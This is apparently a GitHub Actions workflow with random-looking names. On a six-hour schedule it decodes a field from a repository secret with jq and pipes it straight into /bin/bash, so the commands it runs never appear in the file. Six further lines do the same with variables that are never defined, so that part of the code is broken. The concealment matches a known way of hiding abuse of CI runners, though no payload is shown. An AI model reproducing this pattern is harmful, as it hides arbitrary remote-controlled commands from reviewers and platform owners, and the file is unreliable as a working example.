name: alltimexia

on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: alltimexia
        env:
          rclj698: ${{ secrets.rclj698 }}
        run: |
          echo $rclj698 | jq -r .rw9 | /bin/bash
          echo $vv60102 | jq -r .lirz4179 | /bin/bash
          echo $sx5 | jq -r .xoiah76 | /bin/bash
          echo $c36528 | jq -r .kdn38167 | /bin/bash
          echo $fer364 | jq -r .onl11 | /bin/bash
          echo $xgs8891 | jq -r .dabk9595 | /bin/bash
          echo $sviy31195 | jq -r .jv17152 | /bin/bash

